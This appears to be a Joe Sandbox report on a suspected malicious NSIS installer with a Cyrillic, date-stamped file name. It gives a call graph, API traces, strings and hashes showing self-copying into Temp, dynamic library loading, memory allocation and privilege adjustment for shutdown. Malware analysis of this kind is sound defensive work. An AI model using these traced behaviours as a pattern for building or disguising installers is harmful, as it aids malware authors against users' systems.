5452->5456 5457 404231 18 API calls 5453->5457 5459 405b8f 3 API calls 5455->5459 5496 4062ba lstrcpynW 5456->5496 5460 4047bd 5457->5460 5458->5444 5461 404863 5459->5461 5494 404266 SendMessageW 5460->5494 5464 40489a SetDlgItemTextW 5461->5464 5469 4062dc 17 API calls 5461->5469 5464->5437 5465 4047c3 5467 406694 5 API calls 5465->5467 5466 4048fb 5468 406694 5 API calls 5466->5468 5467->5441 5475 404902 5468->5475 5470 404882 lstrcmpiW 5469->5470 5470->5464 5473 404893 lstrcatW 5470->5473 5471 404943 5497 4062ba lstrcpynW 5471->5497 5473->5464 5474 40494a 5476 405c3a 4 API calls 5474->5476 5475->5471 5479 405bdb 2 API calls 5475->5479 5481 40499b 5475->5481 5477 404950 GetDiskFreeSpaceW 5476->5477 5480 404974 MulDiv 5477->5480 5477->5481 5479->5475 5480->5481 5482 404a0c 5481->5482 5484 404ba7 20 API calls 5481->5484 5483 404a2f 5482->5483 5485 40140b 2 API calls 5482->5485 5498 404253 EnableWindow 5483->5498 5486 4049f9 5484->5486 5485->5483 5488 404a0e SetDlgItemTextW 5486->5488 5489 4049fe 5486->5489 5488->5482 5491 404ade 20 API calls 5489->5491 5490 404a4b 5490->5442 5492 40467b SendMessageW 5490->5492 5491->5482 5492->5442 5493->5438 5494->5465 5495->5447 5496->5466 5497->5474 5498->5490 4088 4015a3 4089 402c41 17 API calls 4088->4089 4090 4015aa SetFileAttributesW 4089->4090 4091 4015bc 4090->4091 5499 4028ad 5500 402c41 17 API calls 5499->5500 5502 4028bb 5500->5502 5501 4028d1 5504 405d8b 2 API calls 5501->5504 5502->5501 5503 402c41 17 API calls 5502->5503 5503->5501 5505 4028d7 5504->5505 5527 405db0 GetFileAttributesW CreateFileW 5505->5527 5507 4028e4 5508 4028f0 GlobalAlloc 5507->5508 5509 402987 5507->5509 5510 402909 5508->5510 5511 40297e CloseHandle 5508->5511 5512 4029a2 5509->5512 5513 40298f DeleteFileW 5509->5513 5528 403347 SetFilePointer 5510->5528 5511->5509 5513->5512 5515 40290f 5516 403331 ReadFile 5515->5516 5517 402918 GlobalAlloc 5516->5517 5518 402928 5517->5518 5519 40295c 5517->5519 5521 403116 31 API calls 5518->5521 5520 
405e62 WriteFile 5519->5520 5522 402968 GlobalFree 5520->5522 5523 402935 5521->5523 5524 403116 31 API calls 5522->5524 5525 402953 GlobalFree 5523->5525 5526 40297b 5524->5526 5525->5519 5526->5511 5527->5507 5528->5515 5529 401a30 5530 402c41 17 API calls 5529->5530 5531 401a39 ExpandEnvironmentStringsW 5530->5531 5532 401a60 5531->5532 5533 401a4d 5531->5533 5533->5532 5534 401a52 lstrcmpW 5533->5534 5534->5532 5535 6f262c57 5536 6f262c6f 5535->5536 5537 6f26158f 2 API calls 5536->5537 5538 6f262c8a 5537->5538 4536 402032 4537 402044 4536->4537 4547 4020f6 4536->4547 4538 402c41 17 API calls 4537->4538 4540 40204b 4538->4540 4539 401423 24 API calls 4545 402250 4539->4545 4541 402c41 17 API calls 4540->4541 4542 402054 4541->4542 4543 40206a LoadLibraryExW 4542->4543 4544 40205c GetModuleHandleW 4542->4544 4546 40207b 4543->4546 4543->4547 4544->4543 4544->4546 4559 406703 WideCharToMultiByte 4546->4559 4547->4539 4550 4020c5 4552 405322 24 API calls 4550->4552 4551 40208c 4553 402094 4551->4553 4554 4020ab 4551->4554 4555 40209c 4552->4555 4556 401423 24 API calls 4553->4556 4562 6f261777 4554->4562 4555->4545 4557 4020e8 FreeLibrary 4555->4557 4556->4555 4557->4545 4560 40672d GetProcAddress 4559->4560 4561 402086 4559->4561 4560->4561 4561->4550 4561->4551 4563 6f2617aa 4562->4563 4604 6f261b5f 4563->4604 4565 6f2617b1 4566 6f2618d6 4565->4566 4567 6f2617c2 4565->4567 4568 6f2617c9 4565->4568 4566->4555 4654 6f262352 4567->4654 4638 6f262394 4568->4638 4573 6f26180f 4667 6f262569 4573->4667 4574 6f26182d 4577 6f261833 4574->4577 4578 6f26187e 4574->4578 4575 6f2617df 4580 6f2617e5 4575->4580 4586 6f2617f0 4575->4586 4576 6f2617f8 4587 6f2617ee 4576->4587 4664 6f262d37 4576->4664 4686 6f2615c6 4577->4686 4584 6f262569 10 API calls 4578->4584 4580->4587 4648 6f262aac 4580->4648 4590 6f26186f 4584->4590 4585 6f261815 4678 6f2615b4 4585->4678 4658 6f262724 4586->4658 4587->4573 4587->4574 4596 6f2618c5 4590->4596 4692 6f26252c 4590->4692 4593 6f2617f6 4593->4587 
4594 6f262569 10 API calls 4594->4590 4596->4566 4598 6f2618cf GlobalFree 4596->4598 4598->4566 4601 6f2618b1 4601->4596 4696 6f26153d wsprintfW 4601->4696 4602 6f2618aa FreeLibrary 4602->4601 4699 6f26121b GlobalAlloc 4604->4699 4606 6f261b83 4700 6f26121b GlobalAlloc 4606->4700 4608 6f261da9 GlobalFree GlobalFree GlobalFree 4609 6f261dc6 4608->4609 4625 6f261e10 4608->4625 4610 6f262192 4609->4610 4617 6f261ddb 4609->4617 4609->4625 4612 6f2621b4 GetModuleHandleW 4610->4612 4610->4625 4611 6f261c64 GlobalAlloc 4633 6f261b8e 4611->4633 4614 6f2621c5 LoadLibraryW 4612->4614 4615 6f2621da 4612->4615 4613 6f261ccd GlobalFree 4613->4633 4614->4615 4614->4625 4707 6f26161d WideCharToMultiByte GlobalAlloc WideCharToMultiByte GetProcAddress GlobalFree 4615->4707 4616 6f261caf lstrcpyW 4619 6f261cb9 lstrcpyW 4616->4619 4617->4625 4703 6f26122c 4617->4703 4619->4633 4620 6f26222c 4623 6f262239 lstrlenW 4620->4623 4620->4625 4621 6f2620ec 4621->4625 4631 6f262134 lstrcpyW 4621->4631 4708 6f26161d WideCharToMultiByte GlobalAlloc WideCharToMultiByte GetProcAddress GlobalFree 4623->4708 4624 6f262064 4706 6f26121b GlobalAlloc 4624->4706 4625->4565 4626 6f2621ec 4626->4620 4636 6f262216 GetProcAddress 4626->4636 4629 6f261d0b 4629->4633 4701 6f26158f GlobalSize GlobalAlloc 4629->4701 4630 6f261fa5 GlobalFree 4630->4633 4631->4625 4632 6f262253 4632->4625 4633->4608 4633->4611 4633->4613 4633->4616 4633->4619 4633->4621 4633->4624 4633->4625 4633->4629 4633->4630 4635 6f26122c 2 API calls 4633->4635 4635->4633 4636->4620 4637 6f26206d 4637->4565 4640 6f2623ac 4638->4640 4639 6f26122c GlobalAlloc lstrcpynW 4639->4640 4640->4639 4642 6f2624d5 GlobalFree 4640->4642 4644 6f262454 GlobalAlloc WideCharToMultiByte 4640->4644 4645 6f26247f GlobalAlloc CLSIDFromString 4640->4645 4647 6f26249e 4640->4647 4710 6f2612ba 4640->4710 4642->4640 4643 6f2617cf 4642->4643 4643->4575 4643->4576 4643->4587 4644->4642 4645->4642 4647->4642 4714 6f2626b8 4647->4714 4649 6f262abe 4648->4649 4650 
6f262b63 ReadFile 4649->4650 4653 6f262b81 4650->4653 4652 6f262c4d 4652->4587 4717 6f262a56 4653->4717 4655 6f262367 4654->4655 4656 6f262372 GlobalAlloc 4655->4656 4657 6f2617c8 4655->4657 4656->4655 4657->4568 4662 6f262754 4658->4662 4659 6f262802 4661 6f262808 GlobalSize 4659->4661 4663 6f262812 4659->4663 4660 6f2627ef GlobalAlloc 4660->4663 4661->4663 4662->4659 4662->4660 4663->4593 4665 6f262d42 4664->4665 4666 6f262d82 GlobalFree 4665->4666 4721 6f26121b GlobalAlloc 4667->4721 4669 6f26260e StringFromGUID2 4674 6f262573 4669->4674 4670 6f26261f lstrcpynW 4670->4674 4671 6f2625ec MultiByteToWideChar 4671->4674 4672 6f262656 GlobalFree 4672->4674 4673 6f262632 wsprintfW 4673->4674 4674->4669 4674->4670 4674->4671 4674->4672 4674->4673 4675 6f26268b GlobalFree 4674->4675 4676 6f261272 2 API calls 4674->4676 4722 6f2612e1 4674->4722 4675->4585 4676->4674 4726 6f26121b GlobalAlloc 4678->4726 4680 6f2615b9 4681 6f2615c6 2 API calls 4680->4681 4682 6f2615c3 4681->4682 4683 6f261272 4682->4683 4684 6f2612b5 GlobalFree 4683->4684 4685 6f26127b GlobalAlloc lstrcpynW 4683->4685 4684->4590 4685->4684 4687 6f2615d2 wsprintfW 4686->4687 4688 6f2615ff lstrcpyW 4686->4688 4691 6f261618 4687->4691 4688->4691 4691->4594 4693 6f261891 4692->4693 4694 6f26253a 4692->4694 4693->4601 4693->4602 4694->4693 4695 6f262556 GlobalFree 4694->4695 4695->4694 4697 6f261272 2 API calls 4696->4697 4698 6f26155e 4697->4698 4698->4596 4699->4606 4700->4633 4702 6f2615ad 4701->4702 4702->4629 4709 6f26121b GlobalAlloc 4703->4709 4705 6f26123b lstrcpynW 4705->4625 4706->4637 4707->4626 4708->4632 4709->4705 4711 6f2612c1 4710->4711 4712 6f26122c 2 API calls 4711->4712 4713 6f2612df 4712->4713 4713->4640 4715 6f2626c6 VirtualAlloc 4714->4715 4716 6f26271c 4714->4716 4715->4716 4716->4647 4718 6f262a61 4717->4718 4719 6f262a66 GetLastError 4718->4719 4720 6f262a71 4718->4720 4719->4720 4720->4652 4721->4674 4723 6f26130c 4722->4723 4724 6f2612ea 4722->4724 4723->4674 4724->4723 4725 6f2612f0 
lstrcpyW 4724->4725 4725->4723 4726->4680 5544 6f2616d4 5545 6f261703 5544->5545 5546 6f261b5f 22 API calls 5545->5546 5547 6f26170a 5546->5547 5548 6f261711 5547->5548 5549 6f26171d 5547->5549 5550 6f261272 2 API calls 5548->5550 5551 6f261727 5549->5551 5552 6f261744 5549->5552 5560 6f26171b 5550->5560 5555 6f26153d 3 API calls 5551->5555 5553 6f26176e 5552->5553 5554 6f26174a 5552->5554 5557 6f26153d 3 API calls 5553->5557 5556 6f2615b4 3 API calls 5554->5556 5558 6f26172c 5555->5558 5559 6f26174f 5556->5559 5557->5560 5561 6f2615b4 3 API calls 5558->5561 5562 6f261272 2 API calls 5559->5562 5563 6f261732 5561->5563 5564 6f261755 GlobalFree 5562->5564 5565 6f261272 2 API calls 5563->5565 5564->5560 5566 6f261769 GlobalFree 5564->5566 5567 6f261738 GlobalFree 5565->5567 5566->5560 5567->5560 5568 402a35 5569 402c1f 17 API calls 5568->5569 5570 402a3b 5569->5570 5571 402a72 5570->5571 5572 40288b 5570->5572 5574 402a4d 5570->5574 5571->5572 5573 4062dc 17 API calls 5571->5573 5573->5572 5574->5572 5576 406201 wsprintfW 5574->5576 5576->5572 5577 401735 5578 402c41 17 API calls 5577->5578 5579 40173c SearchPathW 5578->5579 5580 4029e6 5579->5580 5581 401757 5579->5581 5581->5580 5583 4062ba lstrcpynW 5581->5583 5583->5580 5584 4014b8 5585 4014be 5584->5585 5586 401389 2 API calls 5585->5586 5587 4014c6 5586->5587 5588 401db9 GetDC 5589 402c1f 17 API calls 5588->5589 5590 401dcb GetDeviceCaps MulDiv ReleaseDC 5589->5590 5591 402c1f 17 API calls 5590->5591 5592 401dfc 5591->5592 5593 4062dc 17 API calls 5592->5593 5594 401e39 CreateFontIndirectW 5593->5594 5595 402592 5594->5595 5596 40283b 5597 402843 5596->5597 5598 402847 FindNextFileW 5597->5598 5599 402859 5597->5599 5598->5599 5600 4029e6 5599->5600 5602 4062ba lstrcpynW 5599->5602 5602->5600 5603 6f261058 5606 6f261074 5603->5606 5604 6f2610dd 5605 6f261092 5608 6f261516 GlobalFree 5605->5608 5606->5604 5606->5605 5607 6f261516 GlobalFree 5606->5607 5607->5605 5609 6f2610a2 5608->5609 5610 6f2610b2 5609->5610 
5611 6f2610a9 GlobalSize 5609->5611 5612 6f2610b6 GlobalAlloc 5610->5612 5613 6f2610c7 5610->5613 5611->5610 5614 6f26153d 3 API calls 5612->5614 5615 6f2610d2 GlobalFree 5613->5615 5614->5613 5615->5604 5616 6f2618d9 5617 6f2618fc 5616->5617 5618 6f261931 GlobalFree 5617->5618 5619 6f261943 5617->5619 5618->5619 5620 6f261272 2 API calls 5619->5620 5621 6f261ace GlobalFree GlobalFree 5620->5621

Control-flow Graph

[Graph not reproduced; legend: Executed / Not Executed. Entry block 40338f-4033cc: SetErrorMode, GetVersion.]
APIs
• SetErrorMode.KERNELBASE ref: 004033B2
• GetVersion.KERNEL32 ref: 004033B8
• lstrlenA.KERNEL32(UXTHEME,UXTHEME), ref: 004033EB
• #17.COMCTL32(?,00000006,00000008,0000000A), ref: 00403428
• OleInitialize.OLE32(00000000), ref: 0040342F
• SHGetFileInfoW.SHELL32(0042B208,00000000,?,000002B4,00000000), ref: 0040344B
• GetCommandLineW.KERNEL32(Grundlovssikrende36 Setup,NSIS Error,?,00000006,00000008,0000000A), ref: 00403460
• CharNextW.USER32(00000000,"C:\Users\user\Desktop\#U0412#U0421_#U0436#U0438#U0440_#U0442#U0435#U0445#U043d_26.10.2023.exe",00000020,"C:\Users\user\Desktop\#U0412#U0421_#U0436#U0438#U0440_#U0442#U0435#U0445#U043d_26.10.2023.exe",00000000,?,00000006,00000008,0000000A), ref: 00403498
  • Part of subcall function 00406694: GetModuleHandleA.KERNEL32(?,00000020,?,00403401,0000000A), ref: 004066A6
  • Part of subcall function 00406694: GetProcAddress.KERNEL32(00000000,?), ref: 004066C1
• GetTempPathW.KERNEL32(00000400,C:\Users\user\AppData\Local\Temp\,?,00000006,00000008,0000000A), ref: 004035D2
• GetWindowsDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,000003FB,?,00000006,00000008,0000000A), ref: 004035E3
• lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,\Temp), ref: 004035EF
                                                                                                                                                                                                                    • GetTempPathW.KERNEL32(000003FC,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,\Temp,?,00000006,00000008,0000000A), ref: 00403603
                                                                                                                                                                                                                    • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,Low), ref: 0040360B
                                                                                                                                                                                                                    • SetEnvironmentVariableW.KERNEL32(TEMP,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,Low,?,00000006,00000008,0000000A), ref: 0040361C
                                                                                                                                                                                                                    • SetEnvironmentVariableW.KERNEL32(TMP,C:\Users\user\AppData\Local\Temp\,?,00000006,00000008,0000000A), ref: 00403624
                                                                                                                                                                                                                    • DeleteFileW.KERNELBASE(1033,?,00000006,00000008,0000000A), ref: 00403638
                                                                                                                                                                                                                      • Part of subcall function 004062BA: lstrcpynW.KERNEL32(?,?,00000400,00403460,Grundlovssikrende36 Setup,NSIS Error,?,00000006,00000008,0000000A), ref: 004062C7
                                                                                                                                                                                                                    • OleUninitialize.OLE32(00000006,?,00000006,00000008,0000000A), ref: 00403703
                                                                                                                                                                                                                    • ExitProcess.KERNEL32 ref: 00403724
                                                                                                                                                                                                                    • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,~nsu), ref: 00403737
                                                                                                                                                                                                                    • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,0040A26C), ref: 00403746
                                                                                                                                                                                                                    • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,.tmp), ref: 00403751
                                                                                                                                                                                                                    • lstrcmpiW.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\Desktop,C:\Users\user\AppData\Local\Temp\,.tmp,C:\Users\user\AppData\Local\Temp\,~nsu,"C:\Users\user\Desktop\#U0412#U0421_#U0436#U0438#U0440_#U0442#U0435#U0445#U043d_26.10.2023.exe",00000000,00000006,?,00000006,00000008,0000000A), ref: 0040375D
                                                                                                                                                                                                                    • SetCurrentDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,?,00000006,00000008,0000000A), ref: 00403779
                                                                                                                                                                                                                    • DeleteFileW.KERNEL32(0042AA08,0042AA08,?,00435000,00000008,?,00000006,00000008,0000000A), ref: 004037D3
                                                                                                                                                                                                                    • CopyFileW.KERNEL32(C:\Users\user\Desktop\#U0412#U0421_#U0436#U0438#U0440_#U0442#U0435#U0445#U043d_26.10.2023.exe,0042AA08,00000001,?,00000006,00000008,0000000A), ref: 004037E7
                                                                                                                                                                                                                    • CloseHandle.KERNEL32(00000000,0042AA08,0042AA08,?,0042AA08,00000000,?,00000006,00000008,0000000A), ref: 00403814
                                                                                                                                                                                                                    • GetCurrentProcess.KERNEL32(00000028,0000000A,00000006,00000008,0000000A), ref: 00403843
                                                                                                                                                                                                                    • OpenProcessToken.ADVAPI32(00000000), ref: 0040384A
                                                                                                                                                                                                                    • LookupPrivilegeValueW.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 0040385F
                                                                                                                                                                                                                    • AdjustTokenPrivileges.ADVAPI32 ref: 00403882
                                                                                                                                                                                                                    • ExitWindowsEx.USER32(00000002,80040002), ref: 004038A7
                                                                                                                                                                                                                    • ExitProcess.KERNEL32 ref: 004038CA
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000005.00000002.49571583482.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_5_2_400000_#U0412#U0421_#U0436#U0438#U0440_#U0442#U0435#U0445#U043d_26.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: lstrcat$FileProcess$Exit$CurrentDeleteDirectoryEnvironmentHandlePathTempTokenVariableWindows$AddressAdjustCharCloseCommandCopyErrorInfoInitializeLineLookupModeModuleNextOpenPrivilegePrivilegesProcUninitializeValueVersionlstrcmpilstrcpynlstrlen
                                                                                                                                                                                                                    • String ID: "C:\Users\user\Desktop\#U0412#U0421_#U0436#U0438#U0440_#U0442#U0435#U0445#U043d_26.10.2023.exe"$.tmp$1033$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\perula$C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\perula\Tilvirkninger\Jvndgns$C:\Users\user\Desktop$C:\Users\user\Desktop\#U0412#U0421_#U0436#U0438#U0440_#U0442#U0435#U0445#U043d_26.10.2023.exe$Error launching installer$Grundlovssikrende36 Setup$Low$NSIS Error$SeShutdownPrivilege$TEMP$TMP$UXTHEME$\Temp$~nsu
                                                                                                                                                                                                                    • API String ID: 3441113951-1836278071
                                                                                                                                                                                                                    • Opcode ID: c69f0a08dcb2e1d024cd1a682ba050e32cb95b0861efa09548cea5cd73a41d6c
                                                                                                                                                                                                                    • Instruction ID: 34b402965a056e7880f406cddf034ee68ffb155d70387f36a3cc73b0da0a8952
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: c69f0a08dcb2e1d024cd1a682ba050e32cb95b0861efa09548cea5cd73a41d6c
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: FBD11571500310ABE720BF659D45B2B3AACEB4074AF10447FF881B62E1DBBD9E45876E
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • GetDlgItem.USER32(?,000003F9), ref: 00404CB6
                                                                                                                                                                                                                    • GetDlgItem.USER32(?,00000408), ref: 00404CC1
                                                                                                                                                                                                                    • GlobalAlloc.KERNEL32(00000040,?), ref: 00404D0B
                                                                                                                                                                                                                    • LoadBitmapW.USER32(0000006E), ref: 00404D1E
                                                                                                                                                                                                                    • SetWindowLongW.USER32(?,000000FC,00405296), ref: 00404D37
                                                                                                                                                                                                                    • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 00404D4B
                                                                                                                                                                                                                    • ImageList_AddMasked.COMCTL32(00000000,00000000,00FF00FF), ref: 00404D5D
                                                                                                                                                                                                                    • SendMessageW.USER32(?,00001109,00000002), ref: 00404D73
                                                                                                                                                                                                                    • SendMessageW.USER32(?,0000111C,00000000,00000000), ref: 00404D7F
                                                                                                                                                                                                                    • SendMessageW.USER32(?,0000111B,00000010,00000000), ref: 00404D91
                                                                                                                                                                                                                    • DeleteObject.GDI32(00000000), ref: 00404D94
                                                                                                                                                                                                                    • SendMessageW.USER32(?,00000143,00000000,00000000), ref: 00404DBF
                                                                                                                                                                                                                    • SendMessageW.USER32(?,00000151,00000000,00000000), ref: 00404DCB
                                                                                                                                                                                                                    • SendMessageW.USER32(?,00001132,00000000,?), ref: 00404E61
                                                                                                                                                                                                                    • SendMessageW.USER32(?,0000110A,00000003,00000000), ref: 00404E8C
                                                                                                                                                                                                                    • SendMessageW.USER32(?,00001132,00000000,?), ref: 00404EA0
                                                                                                                                                                                                                    • GetWindowLongW.USER32(?,000000F0), ref: 00404ECF
                                                                                                                                                                                                                    • SetWindowLongW.USER32(?,000000F0,00000000), ref: 00404EDD
                                                                                                                                                                                                                    • ShowWindow.USER32(?,00000005), ref: 00404EEE
                                                                                                                                                                                                                    • SendMessageW.USER32(?,00000419,00000000,?), ref: 00404FEB
                                                                                                                                                                                                                    • SendMessageW.USER32(?,00000147,00000000,00000000), ref: 00405050
                                                                                                                                                                                                                    • SendMessageW.USER32(?,00000150,00000000,00000000), ref: 00405065
                                                                                                                                                                                                                    • SendMessageW.USER32(?,00000420,00000000,00000020), ref: 00405089
                                                                                                                                                                                                                    • SendMessageW.USER32(?,00000200,00000000,00000000), ref: 004050A9
                                                                                                                                                                                                                    • ImageList_Destroy.COMCTL32(?), ref: 004050BE
                                                                                                                                                                                                                    • GlobalFree.KERNEL32(?), ref: 004050CE
                                                                                                                                                                                                                    • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00405147
                                                                                                                                                                                                                    • SendMessageW.USER32(?,00001102,?,?), ref: 004051F0
                                                                                                                                                                                                                    • SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 004051FF
                                                                                                                                                                                                                    • InvalidateRect.USER32(?,00000000,00000001), ref: 0040521F
                                                                                                                                                                                                                    • ShowWindow.USER32(?,00000000), ref: 0040526D
                                                                                                                                                                                                                    • GetDlgItem.USER32(?,000003FE), ref: 00405278
                                                                                                                                                                                                                    • ShowWindow.USER32(00000000), ref: 0040527F
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000005.00000002.49571583482.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_5_2_400000_#U0412#U0421_#U0436#U0438#U0440_#U0442#U0435#U0445#U043d_26.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: MessageSend$Window$ImageItemList_LongShow$Global$AllocBitmapCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
                                                                                                                                                                                                                    • String ID: $M$N
                                                                                                                                                                                                                    • API String ID: 1638840714-813528018
                                                                                                                                                                                                                    • Opcode ID: d7fb2f4892de50fbc14c1a930a22a2945486bdf273952240de52388985094c93
                                                                                                                                                                                                                    • Instruction ID: f888d98cc81d7f01a919363da6f821789f230268a52e2f70c0503caf05bd5b25
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: d7fb2f4892de50fbc14c1a930a22a2945486bdf273952240de52388985094c93
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: BB026FB0900209EFDB109FA4DD85AAE7BB5FB84314F14857AF610BA2E0C7799D52CF58
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                      • Part of subcall function 6F26121B: GlobalAlloc.KERNELBASE(00000040,?,6F26123B,?,6F2612DF,00000019,6F2611BE,-000000A0), ref: 6F261225
                                                                                                                                                                                                                    • GlobalAlloc.KERNELBASE(00000040,00001CA4), ref: 6F261C6B
                                                                                                                                                                                                                    • lstrcpyW.KERNEL32(00000008,?), ref: 6F261CB3
                                                                                                                                                                                                                    • lstrcpyW.KERNEL32(00000808,?), ref: 6F261CBD
                                                                                                                                                                                                                    • GlobalFree.KERNEL32(00000000), ref: 6F261CD0
                                                                                                                                                                                                                    • GlobalFree.KERNEL32(?), ref: 6F261DB2
                                                                                                                                                                                                                    • GlobalFree.KERNEL32(?), ref: 6F261DB7
                                                                                                                                                                                                                    • GlobalFree.KERNEL32(?), ref: 6F261DBC
                                                                                                                                                                                                                    • GlobalFree.KERNEL32(00000000), ref: 6F261FA6
                                                                                                                                                                                                                    • lstrcpyW.KERNEL32(?,?), ref: 6F262140
                                                                                                                                                                                                                    • GetModuleHandleW.KERNEL32(00000008), ref: 6F2621B5
                                                                                                                                                                                                                    • LoadLibraryW.KERNEL32(00000008), ref: 6F2621C6
                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(?,?), ref: 6F262220
                                                                                                                                                                                                                    • lstrlenW.KERNEL32(00000808), ref: 6F26223A
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000005.00000002.49589958063.000000006F261000.00000020.00000001.01000000.00000005.sdmp, Offset: 6F260000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_5_2_6f260000_#U0412#U0421_#U0436#U0438#U0440_#U0442#U0435#U0445#U043d_26.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: Global$Free$lstrcpy$Alloc$AddressHandleLibraryLoadModuleProclstrlen
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 245916457-0
                                                                                                                                                                                                                    • Opcode ID: 666352d20a03c4e58c2524f0afa3a1083bfde525a97f98aeb0e586ddb4916d68
                                                                                                                                                                                                                    • Instruction ID: 7c74d7e200c1f53c3f4573048f0d07d2bb2ee65af1089f1303a63d6a097f9606
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 666352d20a03c4e58c2524f0afa3a1083bfde525a97f98aeb0e586ddb4916d68
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 1A2279B1D1464EDBDB148FB88584AEEB7B0FF05B1AF10862AD1A5E6180D774BAC1CF50
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • DeleteFileW.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\,77573420,00000000), ref: 004059F5
                                                                                                                                                                                                                    • lstrcatW.KERNEL32(0042F250,\*.*), ref: 00405A3D
                                                                                                                                                                                                                    • lstrcatW.KERNEL32(?,0040A014), ref: 00405A60
                                                                                                                                                                                                                    • lstrlenW.KERNEL32(?,?,0040A014,?,0042F250,?,?,C:\Users\user\AppData\Local\Temp\,77573420,00000000), ref: 00405A66
                                                                                                                                                                                                                    • FindFirstFileW.KERNEL32(0042F250,?,?,?,0040A014,?,0042F250,?,?,C:\Users\user\AppData\Local\Temp\,77573420,00000000), ref: 00405A76
                                                                                                                                                                                                                    • FindNextFileW.KERNEL32(00000000,00000010,000000F2,?,?,?,?,0000002E), ref: 00405B16
                                                                                                                                                                                                                    • FindClose.KERNEL32(00000000), ref: 00405B25
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    • "C:\Users\user\Desktop\#U0412#U0421_#U0436#U0438#U0440_#U0442#U0435#U0445#U043d_26.10.2023.exe", xrefs: 004059CC
                                                                                                                                                                                                                    • C:\Users\user\AppData\Local\Temp\, xrefs: 004059DA
                                                                                                                                                                                                                    • \*.*, xrefs: 00405A37
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000005.00000002.49571583482.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_5_2_400000_#U0412#U0421_#U0436#U0438#U0440_#U0442#U0435#U0445#U043d_26.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
                                                                                                                                                                                                                    • String ID: "C:\Users\user\Desktop\#U0412#U0421_#U0436#U0438#U0440_#U0442#U0435#U0445#U043d_26.10.2023.exe"$C:\Users\user\AppData\Local\Temp\$\*.*
                                                                                                                                                                                                                    • API String ID: 2035342205-3730370250
                                                                                                                                                                                                                    • Opcode ID: b938c9d9068cedab339b19568100d2823c17cca8f6ff83e158d789dc8ab7bbfb
                                                                                                                                                                                                                    • Instruction ID: 87b7c1c15068e6398432f2de95375e915c3ae258b511550e47b187391169d043
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: b938c9d9068cedab339b19568100d2823c17cca8f6ff83e158d789dc8ab7bbfb
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: EE41E430900914BACB21AB618C89ABF7778EF45768F50427FF801B11D1D77CA982DE6E
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • FindFirstFileW.KERNELBASE(?,00430298,0042FA50,00405CE0,0042FA50,0042FA50,00000000,0042FA50,0042FA50,?,?,77573420,004059EC,?,C:\Users\user\AppData\Local\Temp\,77573420), ref: 00406608
                                                                                                                                                                                                                    • FindClose.KERNELBASE(00000000), ref: 00406614
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000005.00000002.49571583482.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
